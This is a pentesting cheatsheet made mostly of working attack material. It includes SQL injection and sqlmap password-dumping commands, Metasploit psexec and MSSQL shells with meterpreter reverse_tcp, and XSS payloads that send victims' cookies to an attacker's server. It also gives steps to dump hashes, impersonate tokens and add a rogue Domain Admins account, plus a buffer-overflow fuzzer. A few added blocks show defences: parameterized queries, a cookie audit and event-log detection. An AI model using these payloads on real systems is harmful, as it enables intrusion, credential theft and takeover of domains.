# CheatSheet (Short)

{% embed url="https://github.com/slyth11907/Cheatsheets" %}

## SCP

```
[+] Secure Copy (scp) Cheatsheet
--------------------------------

[>] Copy remote file to local host:

$ scp your_username@ip:<remote_file> /some/local/directory

[>] Copy local file to remote host:

$ scp <local_file> your_username@192.168.0.10:/some/remote/directory

[>] Copy local directory to remote directory:

scp -r <local_dir> your_username@ip:/some/remote/directory/<remote_dir>

[>] Copy a file from one remote host to another:

scp your_username@<host1>:/some/remote/directory/foobar.txt your_username@<host2>:/some/remote/directory/

[>] Improve scp performance (use blowfish; note that the blowfish-cbc cipher was removed in OpenSSH 7.6, so modern servers reject it):

scp -c blowfish <local_file> your_username@ip:/some/remote/directory
```

## SQL Injection

```
[+] Union Based SQL Injection

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#


sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
```
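The payloads above work because the input is spliced into the SQL text. As an added example (not part of the original cheatsheet), this shows the same tautology and two-column UNION against a constructed SQLite database, first through string concatenation and then through a bound parameter; SQLite's `--` comment replaces the MySQL `#` used above, and `sqlite_master` stands in for `information_schema.tables`.

```python
import sqlite3

# Constructed in-memory stand-in for the MySQL target the payloads above assume.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hash_a'), ('bob', 'hash_b')")

def lookup_vulnerable(username):
    """Input is concatenated into the statement, so it can change the SQL grammar."""
    sql = "SELECT user, password FROM users WHERE user = '" + username + "'"
    return conn.execute(sql).fetchall()

def lookup_hardened(username):
    """Same query with a bound parameter: the input is only ever a value."""
    sql = "SELECT user, password FROM users WHERE user = ?"
    return conn.execute(sql, (username,)).fetchall()

# SQLite ends a statement with a '--' comment where the MySQL payloads above use '#'.
TAUTOLOGY = "' OR 1=1 --"
# Two-column UNION, matching the two columns of the original SELECT;
# sqlite_master plays the role of information_schema.tables.
UNION_SCHEMA = "' UNION SELECT name, sql FROM sqlite_master --"

if __name__ == "__main__":
    for payload in (TAUTOLOGY, UNION_SCHEMA):
        print("vulnerable:", lookup_vulnerable(payload))
        print("hardened:  ", lookup_hardened(payload))
```

The hardened lookup returns nothing for either payload because the whole string is compared as a username value.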

## AV bypass

```
1. Generate executable using Veil.

2. In msfconsole, set up psexec with the relevant payload (windows/meterpreter/reverse_tcp):

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit
```

## Apache SSL

```
# Enabling self-signed certificates on a local website
    
1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self-signed SSL certificate and key:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Enable the default-ssl site by creating a symbolic link

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

5. Edit the file default-ssl.conf

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf

Change the following lines to point to the certs:

SSLCertificateFile    /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key

6. Restart Apache

sudo /etc/init.d/apache2 restart

More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
```

## Attacking MS-SQL

```
[+] Attacking MSSQL with Metasploit

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info ip ip
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf > use auxiliary/scanner/mssql/mssql_login

[>] Enumerate MSSQL Database:

msf > use auxiliary/admin/mssql/mssql_enum

[>] Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

```

## Bash Scripting

```
Simple Bash Scripting Cheatsheet
--------------------------------

[+] nano Shortcuts
ctrl v			Next page.
ctrl y			Previous page.
ctrl w			Where is (find).
ctrl k			Cut that line of text.
ctrl x     		Exit editor.

[+] Create a text file:
touch file		Creates an empty file.
ifconfig > tmp	Redirect the output of a command into a file.
nano file

[+] Create a file and append text to it:
ifconfig > tmp     
echo >> tmp
ping google.com -c3 >> tmp

[+] How to view a file:
cat file		Show entire contents of file.
more file		Show one page at a time.  Space bar for next page and (q) to exit.
head file		Show the first 10 lines.
head -15 file	Show the first 15 lines.
tail file		Show the last 10 lines.
tail -15 file	Show the last 15 lines.
tail -f file	Useful when viewing the output of a log file.

[+] pipe
cat tmp | grep Bcast	Feeds the output of one process to the input of another process.

[+] Processes
ps aux			Show all running process for all users.
kill -9 PID		Forcefully kill a PID (SIGKILL, cannot be caught by the process).

[+] Word Count
wc -l tmp2		Count the number of lines in a file

[+] cut
-d  delimiter
-f  fields

[+] sort
Sort by unique		sort -u file
Sort IP addresses correctly		sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u		Isolate the IP address

[+] awk
awk '{print $1}' file 		Show the 1st column.
awk '{print $1,$5}' file 	Show the 1st and 5th columns.

[+] grep
grep -v		Remove a single string.
grep -v 'red' file

[+] egrep -v
Remove multiple strings	egrep -v '(red|white|blue)' file

[+] sed
sed 's/FOO/BAR/g' file 		Replace FOO with BAR.
sed 's/FOO//g' file 		Replace FOO with nothing.
sed '/^FOO/d' file 			Remove lines that start with FOO.

[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 
echo -e "\e[1;34mThis is a blue text.\e[0m"




Bash Scripts
------------

[+] Simple bash script:
#!/bin/bash
clear
echo
echo
echo "Hello world."

[+] Make a file executable.
chmod +x file
chmod 755 file

[+] Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
echo "Hello" $name "Your IP address is:" $ip

[+] User Input
read -p "Domain: " domain

#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain

[+] Check For No User Input
if [ -z "$domain" ]; then
	echo
	echo "#########################"
	echo
	echo "Invalid choice."
	echo
	exit
fi

[+] For loops
#!/bin/bash

for host in $(cat hosts.txt)
do
	command $host
done

[+] One Liners

Port Scan:
for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done
```

## CTF CS

```
CTF Notes
---------

# Enumerate Users via Finger
finger user@ip

# Show nfs shares available
showmount -e ip

# Use nfspysh to mount the share and create a .ssh directory
nfspysh -o server=ip:/home/user
mkdir .ssh
cd .ssh

# Generate ssh key pair
ssh-keygen
cp id_rsa.pub /tmp/authorized_keys

# Transfer attacker public key to host
put /tmp/authorized_keys
exit

# Log in to the SSH server with no password
SSH_AUTH_SOCK=0 ssh user@ip


```

## Cookie Stealing

```
[+] Cookie Stealing:

[-] Start Web Service

python -m SimpleHTTPServer 80

[-] Use one of the following XSS payloads:

<script>document.location="http://ip/?c="+document.cookie;</script>
<script>new Image().src="http://ip/index.php?c="+document.cookie;</script>
```
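Both payloads above read `document.cookie`, which only exposes cookies that lack the HttpOnly attribute. As an added example (not from the original cheatsheet), this helper audits Set-Cookie header values for HttpOnly, Secure and SameSite, run over constructed sample headers.

```python
# The two XSS payloads above read document.cookie; a session cookie flagged HttpOnly
# is not exposed to script, so the exfiltrated value is empty. This helper audits
# Set-Cookie header values for that flag and the other hardening attributes.
REQUIRED_ATTRS = {"httponly", "secure", "samesite"}

def audit_set_cookie(header_value):
    """Return (cookie_name, sorted list of missing attributes) for one Set-Cookie value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip().lower()
    missing = set(REQUIRED_ATTRS) - set(attrs)
    # SameSite=None disables the cross-site protection; flag it like an absent attribute.
    if attrs.get("samesite") == "none":
        missing.add("samesite")
    return name, sorted(missing)

def exposed_to_document_cookie(header_value):
    """True when script on the page could read this cookie (no HttpOnly)."""
    return "httponly" in audit_set_cookie(header_value)[1]

# Constructed sample headers, not captured from any real site.
SAMPLE_HEADERS = [
    "PHPSESSID=3f9a1c; Path=/",
    "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
    "track=xyz; Path=/; Secure; SameSite=None",
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(audit_set_cookie(h))
```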

## Domain Admin Exploitation

```
[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts ip/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\administrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
```
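The final two commands above leave a clear trail in the Windows Security log: event 4720 (user account created) followed by 4728 (member added to a security-enabled global group). As an added example (not from the original cheatsheet), this detection correlates the two over constructed sample events in a simplified JSON shape; the field names follow the Security log (`SubjectUserName`, `TargetUserName`, `MemberName`) but the records are not real exports.

```python
import json

# Windows Security log event IDs for the last two commands above:
#   4720  a user account was created
#   4728  a member was added to a security-enabled global group
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins"}

def member_from_dn(dn):
    """'CN=hacker,CN=Users,DC=mydom,DC=local' -> 'hacker'."""
    first = dn.split(",")[0]
    return first.split("=", 1)[1].lower() if "=" in first else first.lower()

def detect_privileged_group_adds(events):
    """Return one alert per 4728 that targets a privileged group.

    Severity is 'critical' when the added member was created (4720) earlier in
    the same batch, which is exactly the net user / net group sequence above.
    """
    created_by = {}
    alerts = []
    for ev in events:
        if ev["EventID"] == 4720:
            created_by[ev["TargetUserName"].lower()] = ev["SubjectUserName"]
        elif ev["EventID"] == 4728 and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            member = member_from_dn(ev["MemberName"])
            alerts.append({
                "group": ev["TargetUserName"],
                "member": member,
                "actor": ev["SubjectUserName"],
                "severity": "critical" if member in created_by else "high",
            })
    return alerts

# Constructed sample events (simplified JSON, not real log exports).
SAMPLE_EVENTS = [json.loads(line) for line in """
{"EventID": 4720, "SubjectUserName": "administrator", "TargetUserName": "hacker"}
{"EventID": 4728, "SubjectUserName": "svc_helpdesk", "TargetUserName": "Helpdesk", "MemberName": "CN=jdoe,CN=Users,DC=mydom,DC=local"}
{"EventID": 4728, "SubjectUserName": "administrator", "TargetUserName": "Domain Admins", "MemberName": "CN=hacker,CN=Users,DC=mydom,DC=local"}
""".strip().splitlines()]

if __name__ == "__main__":
    for alert in detect_privileged_group_adds(SAMPLE_EVENTS):
        print(alert)
```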

## Exploit-Dev

```
Exploit Development Cheatsheet
------------------------------

[+] Fuzzing:

import socket

# Build buffers of increasing length: "A", then 50, 100, ... 'A's.
buffer = ["A"]
counter = 50

while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

# Send each buffer on its own connection so a crash is tied to one length.
for buffstring in buffer:
    print("Fuzzing:" + str(len(buffstring)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("192.168.0.20", 5555))
    sock.send(buffstring.encode())  # Python 3 sockets take bytes, not str
    sock.close()

[+] Bad Character Testing:

"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"


[+] Structured Exception Handler (SEH) Exploitation notes

- Crash the application
- Check SEH overwrite (view the SEH chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add a short jump into the payload to jump over SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Keep enough padding after the shellcode so the total length still triggers the crash.
```

